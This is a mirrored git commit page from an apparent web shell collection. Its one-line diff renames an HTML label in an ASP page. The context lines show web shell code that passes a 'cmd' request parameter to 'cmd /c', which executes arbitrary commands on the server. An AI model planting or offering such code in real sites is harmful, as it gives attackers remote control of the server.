mirror of
https://github.com/tennc/webshell
synced 2024-11-24 20:23:04 +00:00
Fixed label
This commit is contained in:
parent
7e6629ab49
commit
acb55c61bb
1 changed files with 1 additions and 1 deletions
|
@ -39,7 +39,7 @@ end Function
|
||||||
<%Response.Write(Request.ServerVariables("server_software"))%>
|
<%Response.Write(Request.ServerVariables("server_software"))%>
|
||||||
</p>
|
</p>
|
||||||
<p>
|
<p>
|
||||||
<b>The server's software:</b>
|
<b>The server's local address:</b>
|
||||||
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
|
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
|
||||||
<% szCMD = request("cmd")
|
<% szCMD = request("cmd")
|
||||||
thisDir = getCommandOutput("cmd /c" & szCMD)
|
thisDir = getCommandOutput("cmd /c" & szCMD)
|
||||||
|
|
Loading…
Reference in a new issue